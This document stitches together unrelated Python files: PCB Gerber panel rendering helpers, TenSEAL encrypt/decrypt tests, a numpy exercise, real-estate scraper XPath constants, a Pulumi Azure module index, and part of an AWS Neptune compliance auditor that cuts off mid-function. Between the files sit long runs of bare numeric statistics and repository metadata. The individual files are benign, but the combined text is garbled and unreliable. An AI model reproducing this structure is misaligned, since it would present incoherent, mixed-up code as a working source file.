def render_pcb_layer(bounds, layer, path, filename, outline=False, verbose=False):
if bounds is None:
bounds = layer.bounds
size = bounds_to_size(bounds)
resolution = size_to_resolution(size, PIXELS_PER_MM, PIXELS_SIZE_MIN, PIXELS_SIZE_MAX)
ctx = GerberCairoContext(resolution)
if outline:
ctx.get_outline_mask(layer, os.path.join(path, filename+'_mask'),
bounds=bounds, verbose=verbose)
ctx.render_clipped_layer(layer, False, os.path.join(path, filename),
theme.THEMES['Mask'], bounds=bounds, verbose=verbose)
def save_mouse_bite_gm1(path, origin, size, arc, close):
gm1 = generate_mouse_bite_gm1_data(origin, size, arc, close)
with open(os.path.join(path, 'Mouse_Bites-Edge_Cuts.gm1'), "w") as text_file:
text_file.write(gm1)
def render_mouse_bite_gm1(path, filename, origin, size, arc, close):
gm1 = generate_mouse_bite_gm1_data(origin, size, arc, close)
data = rs274x.loads(gm1, 'dummy.gm1')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename, outline=True)
def save_mouse_bite_drl(path, origin, size, radius, space):
drl = generate_mouse_bite_drl_data(origin, size, radius, space)
with open(os.path.join(path, 'Mouse_Bites-NPTH.drl'), "w") as text_file:
text_file.write(drl)
def render_mouse_bite_drl(path, filename, origin, size, radius, gap):
drl = generate_mouse_bite_drl_data(origin, size, radius, gap)
data = excellon.loads(drl, 'dummy.drl')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename)
def save_rail_gm1(path, origin, size, panels, gap, vcut):
gm1 = generate_rail_gm1_data(origin, size, panels, gap, vcut)
with open(os.path.join(path, 'Rails-Edge_Cuts.gm1'), "w") as text_file:
text_file.write(gm1)
def render_rail_gm1(path, filename, origin, size, panels, gap, vcut):
gm1 = generate_rail_gm1_data(origin, size, panels, gap, vcut)
data = rs274x.loads(gm1, 'dummy.gm1')
layer = PCBLayer.from_cam(data)
render_pcb_layer(layer.bounds, layer, path, filename, outline=True)
return layer.bounds
def save_rail_gtl(path, origin, size):
gtl = generate_rail_gtl_data(origin, size)
with open(os.path.join(path, 'Rails-F_Cu.gtl'), "w") as text_file:
text_file.write(gtl)
def render_rail_gtl(bounds, path, filename, origin, size):
gtl = generate_rail_gtl_data(origin, size)
data = rs274x.loads(gtl, 'dummy.gtl')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
def save_rail_gts(path, origin, size):
gts = generate_rail_gts_data(origin, size)
with open(os.path.join(path, 'Rails-F_Mask.gts'), "w") as text_file:
text_file.write(gts)
def render_rail_gts(bounds, path, filename, origin, size):
gts = generate_rail_gts_data(origin, size)
data = rs274x.loads(gts, 'dummy.gts')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
def save_rail_gto(path, origin, size, panels, gap, vcut, jlc):
gto = generate_rail_gto_data(origin, size, panels, gap, vcut, jlc)
with open(os.path.join(path, 'Rails-F_Silkscreen.gto'), "w") as text_file:
text_file.write(gto)
def save_rail_gbo(path, origin, size):
gbo = generate_rail_gbo_data(origin, size)
with open(os.path.join(path, 'Rails-B_Silkscreen.gbo'), "w") as text_file:
text_file.write(gbo)
def render_rail_gto(bounds, path, filename, origin, size, panels, gap, vcut, jlc):
gto = generate_rail_gto_data(origin, size, panels, gap, vcut, jlc)
data = rs274x.loads(gto, 'dummy.gto')
layer = PCBLayer.from_cam(data)
render_pcb_layer(bounds, layer, path, filename)
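# A minimal usage sketch for the save_* helpers above. The output directory,
# rail geometry and panel counts are illustrative assumptions, not values taken
# from the original tool (which derives them from the parsed board and its
# options); os is assumed to be imported at the top of the module, as the
# save_* helpers already rely on os.path.join.
def _example_write_rail_gerbers():
    out_dir = 'panel_output'
    rail_origin = (0.0, 0.0)
    rail_size = (100.0, 5.0)            # a 100 mm x 5 mm rail
    os.makedirs(out_dir, exist_ok=True)
    save_rail_gtl(out_dir, rail_origin, rail_size)      # tooling pads on top copper
    save_rail_gts(out_dir, rail_origin, rail_size)      # matching solder mask openings
    save_rail_gbo(out_dir, rail_origin, rail_size)      # bottom-side mm/inch rulers
    save_rail_gto(out_dir, rail_origin, rail_size,
                  panels=3, gap=2.0, vcut=True, jlc=False)  # silkscreen with V-CUT marks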
| 44.740838
| 120
| 0.640834
| 5,370
| 34,182
| 3.931471
| 0.078212
| 0.252226
| 0.050872
| 0.180277
| 0.823323
| 0.791067
| 0.775767
| 0.757815
| 0.744932
| 0.724327
| 0
| 0.10121
| 0.1681
| 34,182
| 763
| 121
| 44.799476
| 0.641229
| 0.051167
| 0
| 0.413735
| 0
| 0
| 0.166281
| 0.037102
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045226
| false
| 0.001675
| 0.025126
| 0
| 0.090452
| 0.015075
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c069ea307408494deba08e7d92a8e26037b9a8f7
| 5,578
|
py
|
Python
|
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
tests/sealapi/test_encrypt_decrypt.py
|
DreamingRaven/TenSEAL
|
fce3761e38bf87934037eb8631865e18520d1e4b
|
[
"Apache-2.0"
] | null | null | null |
import sys, os
import pytest
import tenseal.sealapi as sealapi
from tempfile import NamedTemporaryFile
from pathlib import Path
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from utils import *
def test_encryptor_bfv():
poly_modulus_degree = 4096
plain_modulus = 1024
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
intenc = sealapi.IntegerEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
expected_value = 1234
plaintext = intenc.encode(expected_value)
def _test_encryptor_symmetric_setup(encryptor):
# encrypt symmetric
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_symmetric(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_symmetric(plaintext)
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
plaintext_out.set_zero()
# zero symmetric
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero_symmetric(ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_zero_symmetric()
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
plaintext_out.set_zero()
# zero symmetric parms_id
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero_symmetric(ctx.last_parms_id(), ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
tmp = NamedTemporaryFile()
serial = encryptor.encrypt_zero_symmetric(ctx.last_parms_id())
serial.save(tmp.name)
assert Path(tmp.name).stat().st_size > 0
def _test_encryptor_pk_setup(encryptor):
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
plaintext_out.set_zero()
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero(ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
plaintext_out.set_zero()
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt_zero(ctx.last_parms_id(), ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == 0
plaintext_out.set_zero()
encryptor = sealapi.Encryptor(ctx, public_key)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
_test_encryptor_symmetric_setup(encryptor)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, secret_key)
_test_encryptor_symmetric_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key)
encryptor.set_secret_key(secret_key)
_test_encryptor_pk_setup(encryptor)
_test_encryptor_symmetric_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, secret_key)
encryptor.set_public_key(public_key)
_test_encryptor_pk_setup(encryptor)
_test_encryptor_symmetric_setup(encryptor)
def test_encryptor_bfv_batch():
batch = [1, 2, 3, 4, 5]
poly_modulus_degree = 8192
plain_modulus = 1032193
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
batchenc = sealapi.BatchEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
def _test_encryptor_pk_setup(encryptor):
ciphertext = sealapi.Ciphertext(ctx)
plaintext = sealapi.Plaintext()
batchenc.encode(batch, plaintext)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
decryptor.decrypt(ciphertext, plaintext_out)
assert batchenc.decode_int64(plaintext_out)[: len(batch)] == batch
plaintext_out.set_zero()
encryptor = sealapi.Encryptor(ctx, public_key)
_test_encryptor_pk_setup(encryptor)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
_test_encryptor_pk_setup(encryptor)
def test_decryptor():
poly_modulus_degree = 4096
plain_modulus = 1024
ctx = helper_context_bfv(poly_modulus_degree, plain_modulus)
keygen = sealapi.KeyGenerator(ctx)
intenc = sealapi.IntegerEncoder(ctx)
public_key = keygen.public_key()
secret_key = keygen.secret_key()
decryptor = sealapi.Decryptor(ctx, secret_key)
encryptor = sealapi.Encryptor(ctx, public_key, secret_key)
expected_value = 1234
plaintext = intenc.encode(expected_value)
ciphertext = sealapi.Ciphertext(ctx)
encryptor.encrypt(plaintext, ciphertext)
plaintext_out = sealapi.Plaintext()
assert decryptor.invariant_noise_budget(ciphertext) > 0
decryptor.decrypt(ciphertext, plaintext_out)
assert intenc.decode_int64(plaintext_out) == expected_value
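# A condensed round-trip sketch of the API exercised by the tests above,
# assuming the same helper_context_bfv fixture from utils; the function name is
# illustrative and not part of the original test module.
def _roundtrip_example():
    ctx = helper_context_bfv(4096, 1024)
    keygen = sealapi.KeyGenerator(ctx)
    intenc = sealapi.IntegerEncoder(ctx)
    encryptor = sealapi.Encryptor(ctx, keygen.public_key(), keygen.secret_key())
    decryptor = sealapi.Decryptor(ctx, keygen.secret_key())
    ciphertext = sealapi.Ciphertext(ctx)
    encryptor.encrypt(intenc.encode(42), ciphertext)
    plaintext_out = sealapi.Plaintext()
    decryptor.decrypt(ciphertext, plaintext_out)
    assert intenc.decode_int64(plaintext_out) == 42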
| 33.806061
| 74
| 0.721943
| 634
| 5,578
| 6.047319
| 0.126183
| 0.093897
| 0.09181
| 0.062598
| 0.862024
| 0.841419
| 0.841419
| 0.81951
| 0.761868
| 0.723005
| 0
| 0.014232
| 0.193797
| 5,578
| 164
| 75
| 34.012195
| 0.838337
| 0.010039
| 0
| 0.764228
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 1
| 0.04878
| false
| 0
| 0.04878
| 0
| 0.097561
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbf4d428363502369e2f5134e48d4cae1978aa5b
| 265
|
py
|
Python
|
HackerRank/Python/np-array-mathematics.py
|
object-oriented-human/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | 2
|
2021-07-27T10:46:47.000Z
|
2021-07-27T10:47:57.000Z
|
HackerRank/Python/np-array-mathematics.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
HackerRank/Python/np-array-mathematics.py
|
foooop/competitive
|
9e761020e887d8980a39a64eeaeaa39af0ecd777
|
[
"MIT"
] | null | null | null |
import numpy
n, m = map(int, input().split())
a = numpy.array([list(map(int, input().split())) for i in range(n)])
b = numpy.array([list(map(int, input().split())) for i in range(n)])
print(a + b)
print(a - b)
print(a * b)
print(a // b)
print(a % b)
print(a ** b)
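# A small offline check of the same element-wise operations, kept in a helper
# that is never called so the stdin-driven solution above is unchanged; the
# sample values are illustrative only.
def _offline_example():
    a = numpy.array([[1, 2, 3, 4]])
    b = numpy.array([[5, 6, 7, 8]])
    print(a + b)   # [[ 6  8 10 12]]
    print(a // b)  # [[0 0 0 0]]
    print(a ** b)  # [[1 64 2187 65536]]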
| 22.083333
| 68
| 0.592453
| 52
| 265
| 3.019231
| 0.326923
| 0.229299
| 0.267516
| 0.382166
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0.802548
| 0
| 0
| 0.158491
| 265
| 12
| 69
| 22.083333
| 0.704036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.1
| 0
| 0.1
| 0.6
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
fbf95296042be9e8e7f44da802b289d5374b5a27
| 1,070
|
py
|
Python
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 16
|
2020-11-17T04:26:30.000Z
|
2022-01-12T03:31:30.000Z
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 2
|
2021-03-05T08:42:35.000Z
|
2021-11-05T09:02:01.000Z
|
lib/const/xpath.py
|
Fomovet/beike-lianjia
|
09c2eaeda4773ddae7d0c38b12ec85b619749c21
|
[
"Apache-2.0"
] | 4
|
2020-11-17T06:32:53.000Z
|
2022-01-04T02:45:22.000Z
|
#!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
# This code is for learning and exchange purposes only; please do not use it for commercial purposes.
# XPATH expressions for page elements
from lib.spider.base_spider import SPIDER_NAME, LIANJIA_SPIDER, BEIKE_SPIDER
if SPIDER_NAME == LIANJIA_SPIDER:
ERSHOUFANG_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
ERSHOUFANG_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
XIAOQU_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
XIAOQU_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
DISTRICT_AREA_XPATH = '//div[3]/div[1]/dl[2]/dd/div/div[2]/a'
CITY_DISTRICT_XPATH = '///div[3]/div[1]/dl[2]/dd/div/div/a'
elif SPIDER_NAME == BEIKE_SPIDER:
ERSHOUFANG_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
ERSHOUFANG_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
XIAOQU_QU_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div/a'
XIAOQU_BANKUAI_XPATH = '//*[@id="filter-options"]/dl[1]/dd/div[2]/a'
DISTRICT_AREA_XPATH = '//div[3]/div[1]/dl[2]/dd/div/div[2]/a'
CITY_DISTRICT_XPATH = '///div[3]/div[1]/dl[2]/dd/div/div/a'
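# A minimal sketch of how these XPath constants are typically consumed when
# scraping a listing page; lxml and the extract_texts helper are assumptions
# used only for illustration and are not part of this module.
def extract_texts(page_source, xpath=ERSHOUFANG_QU_XPATH):
    from lxml import etree
    tree = etree.HTML(page_source)
    return [node.text for node in tree.xpath(xpath)]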
| 46.521739
| 76
| 0.65514
| 180
| 1,070
| 3.716667
| 0.222222
| 0.089686
| 0.155456
| 0.239163
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0.744395
| 0
| 0.028154
| 0.103738
| 1,070
| 22
| 77
| 48.636364
| 0.669447
| 0.079439
| 0
| 0.8
| 0
| 0.133333
| 0.485714
| 0.485714
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.066667
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2200605a0fdc4662269c5ba2285af92aae14bd79
| 67
|
py
|
Python
|
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
temperature_converter_py/__init__.py
|
BrunoASN/temperature_converter_py
|
9c0793b9ed1060fdd2eb776f8d10011a7fe956f3
|
[
"MIT"
] | null | null | null |
# temperature_converter_py
from .temperature_converter_py import *
| 22.333333
| 39
| 0.865672
| 8
| 67
| 6.75
| 0.625
| 0.740741
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089552
| 67
| 2
| 40
| 33.5
| 0.885246
| 0.358209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
220742b0a7512878f074947b8c5120a0a800d975
| 3,870
|
py
|
Python
|
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datashare/v20201001preview/__init__.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .account import *
from .adls_gen1_file_data_set import *
from .adls_gen1_folder_data_set import *
from .adls_gen2_file_data_set import *
from .adls_gen2_file_data_set_mapping import *
from .adls_gen2_file_system_data_set import *
from .adls_gen2_file_system_data_set_mapping import *
from .adls_gen2_folder_data_set import *
from .adls_gen2_folder_data_set_mapping import *
from .adls_gen2_storage_account_data_set import *
from .adls_gen2_storage_account_data_set_mapping import *
from .blob_container_data_set import *
from .blob_container_data_set_mapping import *
from .blob_data_set import *
from .blob_data_set_mapping import *
from .blob_folder_data_set import *
from .blob_folder_data_set_mapping import *
from .blob_storage_account_data_set import *
from .blob_storage_account_data_set_mapping import *
from .data_set import *
from .data_set_mapping import *
from .get_account import *
from .get_adls_gen1_file_data_set import *
from .get_adls_gen1_folder_data_set import *
from .get_adls_gen2_file_data_set import *
from .get_adls_gen2_file_data_set_mapping import *
from .get_adls_gen2_file_system_data_set import *
from .get_adls_gen2_file_system_data_set_mapping import *
from .get_adls_gen2_folder_data_set import *
from .get_adls_gen2_folder_data_set_mapping import *
from .get_adls_gen2_storage_account_data_set import *
from .get_adls_gen2_storage_account_data_set_mapping import *
from .get_blob_container_data_set import *
from .get_blob_container_data_set_mapping import *
from .get_blob_data_set import *
from .get_blob_data_set_mapping import *
from .get_blob_folder_data_set import *
from .get_blob_folder_data_set_mapping import *
from .get_blob_storage_account_data_set import *
from .get_blob_storage_account_data_set_mapping import *
from .get_data_set import *
from .get_data_set_mapping import *
from .get_invitation import *
from .get_kusto_cluster_data_set import *
from .get_kusto_cluster_data_set_mapping import *
from .get_kusto_database_data_set import *
from .get_kusto_database_data_set_mapping import *
from .get_scheduled_synchronization_setting import *
from .get_scheduled_trigger import *
from .get_share import *
from .get_share_subscription import *
from .get_sql_db_table_data_set import *
from .get_sql_db_table_data_set_mapping import *
from .get_sql_dw_table_data_set import *
from .get_sql_dw_table_data_set_mapping import *
from .get_synapse_workspace_sql_pool_table_data_set import *
from .get_synapse_workspace_sql_pool_table_data_set_mapping import *
from .get_synchronization_setting import *
from .get_trigger import *
from .invitation import *
from .kusto_cluster_data_set import *
from .kusto_cluster_data_set_mapping import *
from .kusto_database_data_set import *
from .kusto_database_data_set_mapping import *
from .list_share_subscription_source_share_synchronization_settings import *
from .list_share_subscription_synchronization_details import *
from .list_share_subscription_synchronizations import *
from .list_share_synchronization_details import *
from .list_share_synchronizations import *
from .scheduled_synchronization_setting import *
from .scheduled_trigger import *
from .share import *
from .share_subscription import *
from .sql_db_table_data_set import *
from .sql_db_table_data_set_mapping import *
from .sql_dw_table_data_set import *
from .sql_dw_table_data_set_mapping import *
from .synapse_workspace_sql_pool_table_data_set import *
from .synapse_workspace_sql_pool_table_data_set_mapping import *
from .synchronization_setting import *
from .trigger import *
from ._inputs import *
from . import outputs
| 42.065217
| 80
| 0.851163
| 606
| 3,870
| 4.912541
| 0.120462
| 0.278804
| 0.165939
| 0.182734
| 0.80786
| 0.729258
| 0.621431
| 0.3957
| 0.21431
| 0.079274
| 0
| 0.006021
| 0.098708
| 3,870
| 91
| 81
| 42.527473
| 0.847477
| 0.052455
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
22103c770b336debc43ed2ffe02a68038481d2ba
| 34,545
|
py
|
Python
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/Amazon_Neptune_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
neptune = boto3.client("neptune")
# loop through neptune instances
def describe_db_instances(cache):
response = cache.get("describe_db_instances")
if response:
return response
cache["describe_db_instances"] = neptune.describe_db_instances(
Filters=[{"Name": "engine", "Values": ["neptune"]}]
)
return cache["describe_db_instances"]
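# describe_db_instances above memoises a single boto3 call in the shared cache
# dict so that every check in this module reuses one DescribeDBInstances
# response. The same pattern in isolation (helper name and key are illustrative
# only, not part of ElectricEye):
def _cached(cache, key, producer):
    if key not in cache:
        cache[key] = producer()
    return cache[key]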
@registry.register_check("neptune")
def neptune_instance_multi_az_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.1] Neptune database instances should be configured to be highly available"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
neptuneInstanceArn = str(instances["DBInstanceArn"])
neptuneDbId = str(instances["DBInstanceIdentifier"])
multiAzCheck = str(instances["MultiAZ"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if multiAzCheck == "False":
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-ha-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "LOW"},
"Confidence": 99,
"Title": "[Neptune.1] Neptune database instances should be configured to be highly available",
"Description": "Neptune database instance "
+ neptuneDbId
+ " does not have Multi-AZ enabled and thus is not highly available. Refer to the remediation instructions to remediate this behavior",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune High Availability and how to configure it refer to the High Availability for Neptune section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/feature-overview-availability.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": neptuneInstanceArn + "/neptune-instance-ha-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": neptuneInstanceArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[Neptune.1] Neptune database instances should be configured to be highly available",
"Description": "Neptune database instance "
+ neptuneDbId
+ " is highly available.",
"Remediation": {
"Recommendation": {
"Text": "For more information on Neptune High Availability and how to configure it refer to the High Availability for Neptune section of the Amazon Neptune User Guide",
"Url": "https://docs.aws.amazon.com/neptune/latest/userguide/feature-overview-availability.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsNeptuneInstance",
"Id": neptuneInstanceArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"Other": {"InstanceId": neptuneDbId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF ID.BE-5",
"NIST CSF PR.PT-5",
"NIST SP 800-53 CP-2",
"NIST SP 800-53 CP-11",
"NIST SP 800-53 SA-13",
"NIST SP 800-53 SA14",
"AICPA TSC CC3.1",
"AICPA TSC A1.2",
"ISO 27001:2013 A.11.1.4",
"ISO 27001:2013 A.17.1.1",
"ISO 27001:2013 A.17.1.2",
"ISO 27001:2013 A.17.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("neptune")
def neptune_instance_storage_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[Neptune.2] Neptune database instace storage should be encrypted"""
neptune_instances = describe_db_instances(cache)
for instances in neptune_instances["DBInstances"]:
